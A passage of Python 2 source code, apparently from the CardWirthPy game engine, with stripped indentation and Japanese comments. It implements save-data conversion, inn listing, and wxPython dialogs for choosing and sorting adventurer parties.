ydata = cw.data.YadoData(cw.cwpy.yadodir, cw.cwpy.tempdir, loadparty=False)
# コンバータ
unconv = cw.binary.cwyado.UnconvCWYado(ydata, dstpath, targetengine)
thread = cw.binary.ConvertingThread(unconv)
thread.start()
# プログレスダイアログ表示
dlg = cw.dialog.progress.ProgressDialog(self, u"%sの逆変換" % (yadoname), "",
maximum=unconv.maxnum)
def progress():
while not thread.complete:
wx.CallAfter(dlg.Update, unconv.curnum, unconv.message)
time.sleep(0.001)
wx.CallAfter(dlg.Destroy)
thread2 = threading.Thread(target=progress)
thread2.start()
self.Parent.move_dlg(dlg)
dlg.ShowModal()
finally:
cw.cwpy.yadodir = ""
cw.cwpy.tempdir = ""
# エラーログ表示
if unconv.errorlog:
dlg = cw.dialog.etc.ErrorLogDialog(self, unconv.errorlog)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
# 変換完了ダイアログ
cw.cwpy.play_sound("harvest")
s = u"データの逆変換が完了しました。\n%s" % (unconv.dir)
dlg = message.Message(self, cw.cwpy.msgs["message"], s, mode=2)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def update_list(self, yadodir="", clear_narrowcondition=False):
"""
登録されている宿のリストを更新して、
引数のnameの宿までページを移動する。
"""
if clear_narrowcondition:
self._processing = True
self.narrow.SetValue(u"")
self._processing = False
self._names, self._list, self._list2, self._skins, self._classic, self._isshortcuts, self._imgpaths = self.get_yadolist()
self.list = self._list
if yadodir:
self.index = self.list.index(yadodir)
self.update_narrowcondition()
self.draw(True)
self.enable_btn()
def get_yadolist(self):
"""Yadoにある宿のpathリストと冒険者リストを返す。"""
names = []
yadodirs = []
skins = []
classic = []
isshortcuts = []
imgpaths = []
skin_support = {}
if not os.path.exists(u"Yado"):
os.makedirs(u"Yado")
for dname in os.listdir(u"Yado"):
path = cw.util.join_paths(u"Yado", dname, u"Environment.xml")
if os.path.isfile(path):
prop = cw.header.GetProperty(path)
name = prop.properties.get(u"Name", u"")
if not name:
name = os.path.basename(dname)
names.append(name)
skin = prop.properties.get(u"Skin", u"Classic")
skin = cw.util.join_paths(u"Data/Skin", skin)
skinxml = cw.util.join_paths(skin, u"Skin.xml")
if skinxml in skin_support:
supported_skin = skin_support[skinxml]
else:
if not os.path.isfile(skinxml):
supported_skin = False
else:
supported_skin = cw.header.GetProperty(skinxml).attrs.get(None, {}).get(u"dataVersion",
"0") in cw.SUPPORTED_SKIN
skin_support[skinxml] = supported_skin
if supported_skin:
skins.append(skin)
else:
skins.append(cw.cwpy.skindir)
path = cw.util.join_paths(u"Yado", dname)
yadodirs.append(path)
classic.append(False)
isshortcuts.append("")
imgpaths.append(cw.image.get_imageinfos_p(prop))
continue
path = cw.util.join_paths(u"Yado", dname)
path2 = cw.util.get_linktarget(path)
isshortcut = path2 <> path
if isshortcut:
path = path2
path = cw.util.join_paths(path, u"Environment.wyd")
if os.path.isfile(path):
# クラシックな宿
name = os.path.basename(path2)
names.append(name)
skins.append(cw.cwpy.skindir)
yadodirs.append(path2)
classic.append(True)
if isshortcut:
isshortcuts.append(cw.util.join_paths(u"Yado", dname))
else:
isshortcuts.append("")
imgpaths.append([])
continue
advnames = []
for i, yadodir in enumerate(yadodirs):
seq = []
if classic[i]:
# クラシックな宿
try:
wyd = cw.util.join_paths(yadodir, u"Environment.wyd")
if not os.path.isfile(wyd):
advnames.append([u"*読込失敗*"])
continue
with cw.binary.cwfile.CWFile(wyd, "rb") as f:
wyd = cw.binary.environment.Environment(None, f, True, versiononly=True)
f.close()
if 13 <= wyd.dataversion_int:
# 1.50まで
advnames.append([u"*読込失敗*"])
continue
# 1.20のアルバムデータは時間がかかる可能性があるため
# リストに表示しない
for fname in os.listdir(yadodir):
ext = os.path.splitext(fname)[1].lower()
if ext == ".wch":
fpath = cw.util.join_paths(yadodir, fname)
if wyd.dataversion_int <= 8:
# 1.20
with cw.binary.cwfile.CWFile(fpath, "rb") as f:
f.string()
name = f.string()
f.close()
seq.append(name)
else:
# 1.28以降
with cw.binary.cwfile.CWFile(fpath, "rb") as f:
adv = cw.binary.adventurer.Adventurer(None, f, nameonly=True)
f.close()
seq.append(adv.name)
elif ext == ".wpl":
fpath = cw.util.join_paths(yadodir, fname)
with cw.binary.cwfile.CWFile(fpath, "rb") as f:
party = cw.binary.party.Party(None, f, dataversion=wyd.dataversion_int)
f.close()
for member in party.memberslist:
seq.append(member)
except:
cw.util.print_ex()
else:
yadodb = cw.yadodb.YadoDB(yadodir)
standbys = yadodb.get_standbynames()
if len(standbys) == 0:
yadodb.update(cards=False, adventurers=True, parties=False)
standbys = yadodb.get_standbynames()
seq = standbys
yadodb.close()
advnames.append(seq)
return names, yadodirs, advnames, skins, classic, isshortcuts, imgpaths
#-------------------------------------------------------------------------------
# パーティ選択ダイアログ
#-------------------------------------------------------------------------------
class PartySelect(MultiViewSelect):
"""
冒険の再開。
"""
def __init__(self, parent):
# ダイアログボックス作成
MultiViewSelect.__init__(self, parent, cw.cwpy.msgs["resume_adventure"], wx.ID_OK, 8,
cw.cwpy.setting.show_multipleparties)
self._bg = None
# パーティ情報
self.list = cw.cwpy.ydata.partys
self.index = 0
if cw.cwpy.ydata.lastparty:
# 前回選択されていたパーティ
lastparty = cw.util.get_yadofilepath(cw.cwpy.ydata.lastparty).lower()
for i, header in enumerate(self.list):
if cw.util.get_yadofilepath(header.fpath).lower() == lastparty:
self.index = i
break
self.names = []
# toppanel
self.toppanel = wx.Panel(self, -1, size=cw.wins((460, 280)))
# 絞込条件
choices = (cw.cwpy.msgs["all"],
cw.cwpy.msgs["narrow_party_name"],
cw.cwpy.msgs["member_name"],
cw.cwpy.msgs["description"],
cw.cwpy.msgs["history"],
cw.cwpy.msgs["character_attribute"],
cw.cwpy.msgs["sort_level"])
self._init_narrowpanel(choices, u"", cw.cwpy.setting.parties_narrowtype)
# sort
font = cw.cwpy.rsrc.get_wxfont("paneltitle2", pixelsize=cw.wins(13))
self.sort_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["sort_title"])
self.sort_label.SetFont(font)
choices = (cw.cwpy.msgs["sort_no"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["highest_level"],
cw.cwpy.msgs["average_level"],
cw.cwpy.msgs["money"])
self.sort = wx.Choice(self, size=(-1, cw.wins(20)), choices=choices)
self.sort.SetFont(cw.cwpy.rsrc.get_wxfont("combo", pixelsize=cw.wins(14)))
if cw.cwpy.setting.sort_parties == "Name":
self.sort.Select(1)
elif cw.cwpy.setting.sort_parties == "HighestLevel":
self.sort.Select(2)
elif cw.cwpy.setting.sort_parties == "AverageLevel":
self.sort.Select(3)
elif cw.cwpy.setting.sort_parties == "Money":
self.sort.Select(4)
else:
self.sort.Select(0)
width = 50
# ok
self.okbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_OK, cw.wins((width, 23)), cw.cwpy.msgs["decide"])
self.buttonlist.append(self.okbtn)
# info
self.infobtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((width, 23)), cw.cwpy.msgs["information"])
self.buttonlist.append(self.infobtn)
# edit
self.editbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((width, 23)), cw.cwpy.msgs["members"])
self.buttonlist.append(self.editbtn)
# view
s = cw.cwpy.msgs["member_list"] if self.views == 1 else cw.cwpy.msgs["member_one"]
self.viewbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((width, 23)), s)
self.buttonlist.append(self.viewbtn)
# partyrecord
self.partyrecordbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((width, 23)), cw.cwpy.msgs["party_record"])
self.buttonlist.append(self.partyrecordbtn)
# close
self.closebtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_CANCEL, cw.wins((width, 23)), cw.cwpy.msgs["entry_cancel"])
self.buttonlist.append(self.closebtn)
# additionals
self.create_addctrlbtn(self.toppanel, self._get_bg(), cw.cwpy.setting.show_additional_party)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(self.addctrlbtn, 0, wx.ALIGN_TOP, 0)
self.toppanel.SetSizer(sizer)
self.additionals.append(self.narrow_label)
self.additionals.append(self.narrow)
self.additionals.append(self.narrow_type)
self.additionals.append(self.sort_label)
self.additionals.append(self.sort)
self.update_additionals()
self.update_narrowcondition()
# enable btn
self.enable_btn()
# layout
self._do_layout()
# bind
self._bind()
self.Bind(wx.EVT_BUTTON, self.OnClickInfoBtn, self.infobtn)
self.Bind(wx.EVT_BUTTON, self.OnClickEditBtn, self.editbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickViewBtn, self.viewbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickPartyRecordBtn, self.partyrecordbtn)
self.Bind(wx.EVT_CHOICE, self.OnSort, self.sort)
self.toppanel.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDClick)
seq = self.accels
self.sortkeydown = []
for i in xrange(0, 9):
sortkeydown = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnNumberKeyDown, id=sortkeydown)
seq.append((wx.ACCEL_CTRL, ord('1')+i, sortkeydown))
self.sortkeydown.append(sortkeydown)
self.append_addctrlaccelerator(seq)
cw.util.set_acceleratortable(self, seq)
self.draw(True)
def save_views(self, multi):
cw.cwpy.setting.show_multipleparties = multi
def update_additionals(self):
Select.update_additionals(self)
cw.cwpy.setting.show_additional_party = self.addctrlbtn.GetToggle()
def _add_topsizer(self):
nsizer = wx.BoxSizer(wx.HORIZONTAL)
nsizer.Add(self.narrow_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(2))
nsizer.Add(self.narrow, 1, wx.CENTER, 0)
nsizer.Add(self.narrow_type, 0, wx.CENTER|wx.EXPAND, cw.wins(3))
nsizer.Add(self.sort_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(3))
nsizer.Add(self.sort, 0, wx.CENTER|wx.EXPAND, 0)
self.topsizer.Add(nsizer, 0, wx.EXPAND, 0)
def _on_narrowcondition(self):
cw.cwpy.setting.parties_narrowtype = self.narrow_type.GetSelection()
self.update_narrowcondition()
self.draw(True)
def update_narrowcondition(self):
if 0 <= self.index and self.index < len(self.list):
selected = self.list[self.index]
else:
selected = None
self.list = cw.cwpy.ydata.partys[:]
narrow = self.narrow.GetValue().lower()
donarrow = self.narrow.IsShown() and bool(narrow)
ntype = self.narrow_type.GetSelection()
if donarrow:
hiddens = set([u"_", u"@"])
attrs = set(cw.cwpy.setting.periodnames)
attrs.update(cw.cwpy.setting.sexnames)
attrs.update(cw.cwpy.setting.naturenames)
attrs.update(cw.cwpy.setting.makingnames)
_NARROW_ALL = 0
_NARROW_NAME = 1
_NARROW_MEMBER = 2
_NARROW_DESC = 3
_NARROW_HISTORY = 4
_NARROW_FEATURES = 5
_NARROW_LEVEL = 6
if ntype in (_NARROW_LEVEL, _NARROW_ALL):
# レベル
try:
intnarrow = int(narrow)
except:
intnarrow = None
ntypes = set()
if ntype == _NARROW_ALL:
ntypes.add(_NARROW_NAME)
ntypes.add(_NARROW_MEMBER)
ntypes.add(_NARROW_DESC)
ntypes.add(_NARROW_HISTORY)
ntypes.add(_NARROW_FEATURES)
ntypes.add(_NARROW_LEVEL)
else:
ntypes.add(ntype)
seq = []
for header in self.list:
def has_membername():
for mname in header.get_membernames():
if narrow in mname.lower():
return True
return False
def has_memberdesc():
for mdesc in header.get_memberdescs():
if narrow in mdesc.lower():
return True
return False
def has_memberhistory():
for coupons in header.get_membercoupons():
for coupon in coupons:
if coupon:
if cw.cwpy.is_debugmode():
if coupon[0] == u"_" and coupon[1:] in attrs:
continue
else:
if coupon[0] in hiddens:
continue
if narrow in coupon.lower():
return True
return False
def has_memberfeatures():
for coupons in header.get_membercoupons():
for coupon in coupons:
if coupon and coupon[0] == u"_":
coupon = coupon[1:]
if coupon in attrs:
if narrow in coupon.lower():
return True
return False
def has_memberlevel():
if intnarrow is None:
return False
maxlevel = max(*header.get_memberlevels())
minlevel = min(*header.get_memberlevels())
return (minlevel <= intnarrow <= maxlevel)
if (_NARROW_NAME in ntypes and narrow in header.name.lower()) or\
(_NARROW_MEMBER in ntypes and has_membername()) or \
(_NARROW_DESC in ntypes and has_memberdesc()) or \
(_NARROW_HISTORY in ntypes and has_memberhistory()) or \
(_NARROW_FEATURES in ntypes and has_memberfeatures()) or \
(_NARROW_LEVEL in ntypes and has_memberlevel()):
seq.append(header)
self.list = seq
if selected in self.list:
self.index = self.list.index(selected)
elif self.list:
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
def _get_bg(self):
if self._bg:
return self._bg
path = "Table/Book"
path = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir, path), cw.cwpy.rsrc.ext_img)
self._bg = cw.util.load_wxbmp(path, can_loaded_scaledimage=True)
return self._bg
def OnNumberKeyDown(self, event):
"""
数値キー'1'~'9'までの押下を処理する。
PlayerSelectではソート条件の変更を行う。
"""
if self._processing:
return
if self.sort.IsShown():
index = self.sortkeydown.index(event.GetId())
if index < self.sort.GetCount():
self.sort.SetSelection(index)
event = wx.PyCommandEvent(wx.wxEVT_COMMAND_CHOICE_SELECTED, self.sort.GetId())
self.ProcessEvent(event)
def OnSort(self, event):
if self._processing:
return
index = self.sort.GetSelection()
if index == 1:
sorttype = "Name"
elif index == 2:
sorttype = "HighestLevel"
elif index == 3:
sorttype = "AverageLevel"
elif index == 4:
sorttype = "Money"
else:
sorttype = "None"
if cw.cwpy.setting.sort_parties <> sorttype:
cw.cwpy.play_sound("page")
cw.cwpy.setting.sort_parties = sorttype
cw.cwpy.ydata.sort_parties()
self.update_narrowcondition()
self.draw(True)
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if self._processing:
return
if change_combo(self.narrow_type, event):
return
elif change_combo(self.sort, event):
return
else:
MultiViewSelect.OnMouseWheel(self, event)
def OnClickInfoBtn(self, event):
if not self.list:
return
cw.cwpy.play_sound("click")
header = self.list[self.index]
party = cw.data.Party(header, True)
dlg = cw.dialog.edit.PartyEditor(self.Parent, party)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
header = cw.cwpy.ydata.create_partyheader(element=party.data.find("Property"))
header.data = party
self.list[self.index] = header
cw.cwpy.ydata.partys[self.index] = header
self.draw(True)
def OnClickEditBtn(self, event):
if not self.list:
return
partyheader = self.list[self.index]
def redrawfunc():
def func():
header = self.list[self.index]
header = cw.cwpy.ydata.create_partyheader(header.fpath)
header.data = partyheader.data
self.list[self.index] = header
cw.cwpy.ydata.partys[self.index] = header
cw.cwpy.frame.exec_func(self.draw, True)
cw.cwpy.exec_func(func)
cw.cwpy.play_sound("click")
dlg = cw.dialog.charainfo.StandbyPartyCharaInfo(self.Parent, partyheader, redrawfunc)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def OnClickPartyRecordBtn(self, event):
if self._processing:
return
cw.cwpy.play_sound("click")
dlg = cw.dialog.partyrecord.SelectPartyRecord(self)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
if not (1 < len(dlg.list) or cw.cwpy.ydata.party):
self.partyrecordbtn.Disable()
dlg.Destroy()
def get_selected(self):
if self.list:
return self.list[self.index]
else:
return None
def update_standbys(self, selected):
pass
def can_clickcenter(self):
return self.okbtn.IsEnabled()
def enable_btn(self):
# リストが空だったらボタンを無効化
if not self.list:
enables = set()
if cw.cwpy.ydata.party or cw.cwpy.ydata.partyrecord:
enables.add(self.partyrecordbtn)
enables.add(self.closebtn)
self._disable_btn(enables)
elif len(self.list) == 1:
self._enable_btn((self.rightbtn, self.right2btn, self.leftbtn, self.left2btn))
else:
self._enable_btn()
if not (cw.cwpy.ydata.party or cw.cwpy.ydata.partyrecord):
self.partyrecordbtn.Disable()
def draw(self, update=False):
dc = Select.draw(self, update)
# 背景
bmp = cw.wins(self._get_bg())
bmpw = bmp.GetSize()[0]
dc.DrawBitmap(bmp, 0, 0, False)
# リストが空だったら描画終了
if not self.list:
return
def get_image(header):
sceheader = header.get_sceheader()
if sceheader:
bmp, bmp_noscale, imgpaths = sceheader.get_wxbmps()
else:
if cw.cwpy.ydata.imgpaths:
imgpaths = []
bmp = []
bmp_noscale = []
imgpaths = []
for info in cw.cwpy.ydata.imgpaths:
if not info.path:
continue
fpath = cw.util.join_paths(cw.cwpy.ydata.yadodir, info.path)
bmp_noscale2 = cw.util.load_wxbmp(fpath, True, can_loaded_scaledimage=True)
bmp2 = cw.wins(bmp_noscale2)
bmp.append(bmp2)
bmp_noscale.append(None)
imgpaths.append(info)
pass
else:
path = "Resource/Image/Card/COMMAND0"
path = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir, path), cw.cwpy.rsrc.ext_img)
bmp_noscale = [cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True)]
bmp = [cw.wins(bmp_noscale[0])]
imgpaths = [cw.image.ImageInfo(path=path)]
paths = header.get_memberpaths()
bmp2 = []
if paths:
fpath = paths[0]
fpath = cw.util.get_yadofilepath(fpath)
if os.path.isfile(fpath):
prop = cw.header.GetProperty(fpath)
paths = cw.image.get_imageinfos_p(prop)
for info in paths:
info.path = cw.util.join_yadodir(info.path)
can_loaded_scaledimage = cw.util.str2bool(prop.attrs[None].get("scaledimage", "False"))
for info in paths:
fpath = info.path
if os.path.isfile(fpath):
bmp3 = cw.util.load_wxbmp(fpath, True, can_loaded_scaledimage=can_loaded_scaledimage)
bmp4 = cw.wins(bmp3)
w = bmp4.GetWidth() // 2
h = bmp4.GetHeight() // 2
if w and h:
bmpdepthis1 = hasattr(bmp4, "bmpdepthis1")
maskcolour = bmp4.maskcolour if hasattr(bmp4, "maskcolour") else None
if bmpdepthis1:
img = cw.util.convert_to_image(bmp4)
else:
img = bmp4.ConvertToImage()
img = img.Rescale(w, h, wx.IMAGE_QUALITY_NORMAL)
bmp4 = img.ConvertToBitmap()
if bmpdepthis1:
bmp4.bmpdepthis1 = bmpdepthis1
if maskcolour:
bmp4.maskcolour = maskcolour
bmp2.append((bmp3, bmp4, info))
return bmp, bmp_noscale, bmp2, sceheader, imgpaths
if self.views == 1:
# 単独表示
header = self.list[self.index]
# 見出し
dc.SetTextForeground(wx.BLACK)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["adventurers_team"]
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(25))
# 所持金
s = cw.cwpy.msgs["adventurers_money"] % (header.money)
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(60))
# メンバ名
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(14)))
if update:
self.names = header.get_membernames()
if len(header.members) > 3:
n = (3, len(self.names) - 3)
else:
n = (len(self.names), 0)
w = cw.wins(90)
for index, s in enumerate(self.names):
s = cw.util.abbr_longstr(dc, s, cw.wins(90))
if index < 3:
dc.DrawLabel(s, wx.Rect((bmpw-w*n[0])/2+w*index, cw.wins(85), w, cw.wins(15)), wx.ALIGN_CENTER)
else:
dc.DrawLabel(s, wx.Rect((bmpw-w*n[1])/2+w*(index-3), cw.wins(105), w, cw.wins(15)), wx.ALIGN_CENTER)
# パーティ名
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(20)))
s = header.name
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(40))
# シナリオ・宿画像
bmp, bmp_noscale, bmp2, sceheader, imgpaths = get_image(header)
ix = (bmpw-cw.wins(74))//2
iy = cw.wins(125)
dc.SetClippingRect((ix, iy, cw.wins(cw.SIZE_CARDIMAGE[0]), cw.wins(cw.SIZE_CARDIMAGE[1])))
for b, bns, info in zip(bmp, bmp_noscale, imgpaths):
baserect = info.calc_basecardposition_wx(b.GetSize(), noscale=False,
basecardtype="Bill",
cardpostype="NotCard")
if bns is None:
dc.DrawBitmap(b, ix+baserect.x, iy+baserect.y, True)
else:
cw.imageretouch.wxblit_2bitbmp_to_card(dc, b, ix+baserect.x, iy+baserect.y, True, bitsizekey=bns)
dc.DestroyClippingRegion()
# パーティの先頭メンバを小さく表示する
px = bmpw/2
py = cw.wins(125+47)
pw = cw.wins(cw.SIZE_CARDIMAGE[0])
ph = cw.wins(cw.SIZE_CARDIMAGE[1])
dc.SetClippingRect(wx.Rect(px, py, pw//2, ph//2))
for bmp3, bmp4, info in bmp2:
iw, ih = bmp3.GetSize()
scr_scale = bmp3.scr_scale if hasattr(bmp3, "scr_scale") else 1
iw //= scr_scale
ih //= scr_scale
baserect = info.calc_basecardposition_wx((iw, ih), noscale=True,
basecardtype="LargeCard",
cardpostype="NotCard")
baserect = cw.wins(baserect)
baserect.x //= 2
baserect.y //= 2
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp4, px+baserect.x, py+baserect.y, True, bitsizekey=bmp3)
dc.DestroyClippingRegion()
# シナリオ・宿名
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(14)))
if sceheader:
s = sceheader.name
else:
s = cw.cwpy.ydata.name
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(225))
# ページ番号
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = str(self.index+1) if self.index > 0 else str(-self.index + 1)
s = s + " / " + str(len(self.list))
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(250))
else:
# 一覧表示
page = self.get_page()
sindex = page * self.views
seq = self.list[sindex:sindex+self.views]
x = 0
y = 0
size = self.toppanel.GetSize()
rw = size[0] / (self.views / 2)
rh = size[1] / 2
dc.SetTextForeground(wx.BLACK)
for i, header in enumerate(seq):
# 宿・シナリオイメージ
bmp, bmp_noscale, bmp2, sceheader, imgpaths = get_image(header)
ix = x + (rw - cw.wins(72)) / 2
iy = y + cw.s(5)
dc.SetClippingRect((ix, iy, cw.wins(cw.SIZE_CARDIMAGE[0]), cw.wins(cw.SIZE_CARDIMAGE[1])))
for b, bns, info in zip(bmp, bmp_noscale, imgpaths):
baserect = info.calc_basecardposition_wx(b.GetSize(), noscale=False,
basecardtype="Bill",
cardpostype="NotCard")
if bns is None:
dc.DrawBitmap(b, ix+baserect.x, iy+baserect.y, True)
else:
cw.imageretouch.wxblit_2bitbmp_to_card(dc, b, ix+baserect.x, iy+baserect.y, True, bitsizekey=bns)
dc.DestroyClippingRegion()
# パーティの先頭メンバを小さく表示する
px = ix + cw.wins(37)
py = iy + cw.wins(47)
pw = cw.wins(cw.SIZE_CARDIMAGE[0])
ph = cw.wins(cw.SIZE_CARDIMAGE[1])
dc.SetClippingRect(wx.Rect(px, py, pw//2, ph//2))
for bmp3, bmp4, info in bmp2:
iw, ih = bmp3.GetSize()
scr_scale = bmp3.scr_scale if hasattr(bmp3, "scr_scale") else 1
iw //= scr_scale
ih //= scr_scale
baserect = info.calc_basecardposition_wx((iw, ih), noscale=True,
basecardtype="LargeCard",
cardpostype="NotCard")
baserect = cw.wins(baserect)
baserect.x //= 2
baserect.y //= 2
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp4, px+baserect.x, py+baserect.y, True, bitsizekey=bmp3)
dc.DestroyClippingRegion()
# パーティ名
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = header.name
s = cw.util.abbr_longstr(dc, s, rw)
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, x + (rw - w) / 2, y + cw.wins(105))
# シナリオ・宿名
if sceheader:
s = sceheader.name
s = cw.util.abbr_longstr(dc, s, rw)
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, x + (rw - w) / 2, y + cw.wins(120))
# 選択マーク
if sindex + i == self.index:
bmp = cw.cwpy.rsrc.wxstatuses["TARGET"]
dc.DrawBitmap(bmp, ix + cw.wins(58), iy + cw.wins(80), True)
if self.views / 2 == i + 1:
x = 0
y += rh
else:
x += rw
# ページ番号
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = str(page+1) if page > 0 else str(-page + 1)
s = s + " / " + str(self.get_pagecount())
cw.util.draw_witharound(dc, s, cw.wins(5), cw.wins(5))
#-------------------------------------------------------------------------------
# 冒険者選択ダイアログ
#-------------------------------------------------------------------------------
class PlayerSelect(MultiViewSelect):
"""
宿帳を開く。
"""
def __init__(self, parent):
# ダイアログボックス作成
MultiViewSelect.__init__(self, parent, cw.cwpy.msgs["select_member_title"], wx.ID_ADD, 10,
cw.cwpy.setting.show_multipleplayers)
self._bg = None
# 冒険者情報
self.list = []
self.isalbum = False
self.index = 0
# toppanel
self.toppanel = wx.Panel(self, -1, size=cw.wins((460, 280)))
self.toppanel.SetMinSize(cw.wins((460, 280)))
# 絞込条件
choices = (cw.cwpy.msgs["all"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["description"],
cw.cwpy.msgs["history"],
cw.cwpy.msgs["character_attribute"],
cw.cwpy.msgs["sort_level"])
self._init_narrowpanel(choices, u"", cw.cwpy.setting.standbys_narrowtype)
# sort
font = cw.cwpy.rsrc.get_wxfont("paneltitle2", pixelsize=cw.wins(13))
self.sort_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["sort_title"])
self.sort_label.SetFont(font)
choices = (cw.cwpy.msgs["sort_no"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["sort_level"])
self.sort = wx.Choice(self, size=(-1, cw.wins(20)), choices=choices)
self.sort.SetFont(cw.cwpy.rsrc.get_wxfont("combo", pixelsize=cw.wins(14)))
if cw.cwpy.setting.sort_standbys == "Name":
self.sort.Select(1)
elif cw.cwpy.setting.sort_standbys == "Level":
self.sort.Select(2)
else:
self.sort.Select(0)
# add
self.addbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_ADD, cw.wins((50, 23)), cw.cwpy.msgs["add_member"])
self.buttonlist.append(self.addbtn)
# info
self.infobtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["information"])
self.buttonlist.append(self.infobtn)
# new
self.newbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["new"])
self.buttonlist.append(self.newbtn)
# extension
self.exbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["extension"])
self.buttonlist.append(self.exbtn)
# view
s = cw.cwpy.msgs["member_list"] if self.views == 1 else cw.cwpy.msgs["member_one"]
self.viewbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), s)
self.buttonlist.append(self.viewbtn)
# close
self.closebtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_CANCEL, cw.wins((50, 23)), cw.cwpy.msgs["close"])
self.buttonlist.append(self.closebtn)
# additionals
self.create_addctrlbtn(self.toppanel, self._get_bg(), cw.cwpy.setting.show_additional_player)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(self.addctrlbtn, 0, wx.ALIGN_TOP, 0)
self.toppanel.SetSizer(sizer)
self.additionals.append(self.narrow_label)
self.additionals.append(self.narrow)
self.additionals.append(self.narrow_type)
self.additionals.append(self.sort_label)
self.additionals.append(self.sort)
self.update_additionals()
self.update_narrowcondition()
# layout
self._do_layout()
# bind
self._bind()
self.Bind(wx.EVT_BUTTON, self.OnClickAddBtn, self.addbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickInfoBtn, self.infobtn)
self.Bind(wx.EVT_BUTTON, self.OnClickNewBtn, self.newbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickExBtn, self.exbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickViewBtn, self.viewbtn)
self.Bind(wx.EVT_CHOICE, self.OnSort, self.sort)
self.toppanel.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDClick)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(cw.wins((383, 0)), 0)
sizer.Add(self.sort, 0, wx.TOP, cw.wins(2))
self.toppanel.SetSizer(sizer)
self.toppanel.Layout()
seq = self.accels
newcreateid = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnClickNewBtn, id=newcreateid)
seq.append((wx.ACCEL_CTRL, ord('N'), newcreateid))
randomcreateid = wx.NewId()
self.Bind(wx.EVT_MENU, self.create_randomadventurer, id=randomcreateid)
seq.append((wx.ACCEL_CTRL, ord('A'), randomcreateid))
self.sortkeydown = []
for i in xrange(0, 9):
sortkeydown = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnNumberKeyDown, id=sortkeydown)
seq.append((wx.ACCEL_CTRL, ord('1')+i, sortkeydown))
self.sortkeydown.append(sortkeydown)
self.append_addctrlaccelerator(seq)
cw.util.set_acceleratortable(self, seq)
def save_views(self, multi):
cw.cwpy.setting.show_multipleplayers = multi
def update_additionals(self):
Select.update_additionals(self)
cw.cwpy.setting.show_additional_player = self.addctrlbtn.GetToggle()
def OnKeyDown(self, event):
if event.GetKeyCode() == wx.WXK_DELETE and self.list:
self.delete_adventurer()
return
def _add_topsizer(self):
nsizer = wx.BoxSizer(wx.HORIZONTAL)
nsizer.Add(self.narrow_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(2))
nsizer.Add(self.narrow, 1, wx.CENTER, 0)
